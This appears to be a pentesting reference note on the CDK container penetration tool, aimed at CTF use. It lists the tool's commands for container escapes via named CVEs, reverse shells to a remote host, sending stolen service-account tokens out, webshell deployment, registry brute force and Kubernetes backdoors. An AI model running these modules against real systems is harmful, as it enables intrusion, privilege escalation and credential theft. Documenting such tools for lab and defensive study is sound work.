CDK is a container penetration script.
This tool is really useful for CTFs where you gain a reverse shell inside a docker container, since it will first enumerate the possible vulnerabilities it is vulnerable to, and then allow you to exploit them.
Even though it is a easy tool to use, it can get hard when you need to modify some payload to make it work.
cdk evaluate --fullcdk run --listcdk run [script-name] [options]k8s-cronjob create cronjob with user specified image and cmd. Usage: cdk run k8s-cronjob (default|anonymous|[token-path]) (min|hour|day|[cron-expr]) [image] [args]
k8s-shadow-apiserver duplicate kube-apiserver pod, disable logs and grant all privilege to anonymous user. usage: cdk run k8s-shadow-apiserver (default|anonymous|[service-account-token-path])
cap-dac-read-search Read files from host or chroot to host and spawn a cmd. The First argument is file bind-mounted to container from host (default: /etc/hostname), the second argument specifies which file to read (default: /etc/shadow), the third and remaining arguments specifies command executed in host root filesystem (default: /bin/bash). If there is one argument, the first argument is the target file to read. When second argument is "/", this exploit will spawn a cmd.
k8s-configmap-dump try to dump K8s configmap in multiple ways, usage: cdk run k8s-configmap-dump (auto|[service-account-token-path])
service-probe scan subnet to find Docker/K8s inner services, usage: cdk run service-probe 192.168.1.0-255
docker-sock-pwn Create and run [cmd] in a container with host root `/` mounted to container `/host` usage: ./cdk docker-sock-deploy [sock_path] [shell_cmd] example: ./cdk docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"
k8s-psp-dump Dump K8S Pod Security Policies and try, usage: cdk run k8s-psp-dump (auto|[service-account-token-path])
shim-pwn pwn CVE-2020-15257,start a privileged reverse shell to remote host or execute cmd. usage: "./cdk shim-pwn reverse [RHOST] [RPORT]" or "./cmd shim-pwn [SHELL_CMD]"
k8s-backdoor-daemonset deploy image to every node using daemonset, usage: cdk run k8s-backdoor-daemonset (default|anonymous|[service-account-token-path]) [image] [cmd]
k8s-get-sa-token Dump target service-account token and send it to remote ip:port, usage: cdk run k8s-get-sa-token (default|anonymous|[service-account-token-path]) [target-service-account] [ip] [port]
mount-disk escape privileged container via disk mount, usage: `./cdk run mount-disk`
runc-pwn container escape via CVE-2019-5736. usage: ./cdk runc-pwn [shell-cmd]
webshell-deploy Write webshell to target path. Usage: cdk run webshell-deploy (php|jsp) [filepath].
ak-leakage search AK/Secrets from input dir, usage: cdk run ak-leakage [dir]
registry-brute To container image registry, brute force the accounts and passwords cracking. Usage: ./cdk registry-brute [registry-url] [username|file] [password|file]. Example: ./cdk registry-brute https://index.docker.io/ root,admin /tmp/passwordfile.
k8s-secret-dump try to dump K8s secret in multiple ways, usage: cdk run k8s-secret-dump (auto|[service-account-token-path])
lxcfs-rw escape container when root has LXCFS read & write privilege, usage: `./cdk run lxcfs-rw`
reverse-shell reverse shell to remote addr, usage: cdk run reverse-shell [ip:port]
mount-cgroup escape privileged container via cgroup. usage: ./cdk run mount-cgroup "shell-cmd-payloads"
k8s-mitm-clusterip Exploit CVE-2020-8554: Man in the middle using ExternalIPs, usage: cdk run k8s-mitm-clusterip (default|anonymous|[service-account-token-path]) [image] [ip] [port]
mount-procfs escape container via mounted procfs. usage: cdk run mount-procfs [dir] "[shell-payload]"
rewrite-cgroup-devices escape sys_admin capabilities container via rewrite cgroup devices.allow. usage: ./cdk run rewrite-cgroup-devices.
docker-sock-check check if docker unix socket available. usage: ./cdk docker-sock-check [sock_path]
test-poc this is the test script
check-ptrace check if pid injection works with cap=SYS_PTRACE. usage: ./cdk run check-ptrace
istio-check Check was the shell in a istio(service mesh) network, please note that this feature will request http://httpbin.org/get. Usage: cdk run istio-check.
docker-api-pwn Create and run [cmd] in a container with host `/` mounted to `/host`. usage: ./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/pwn-success"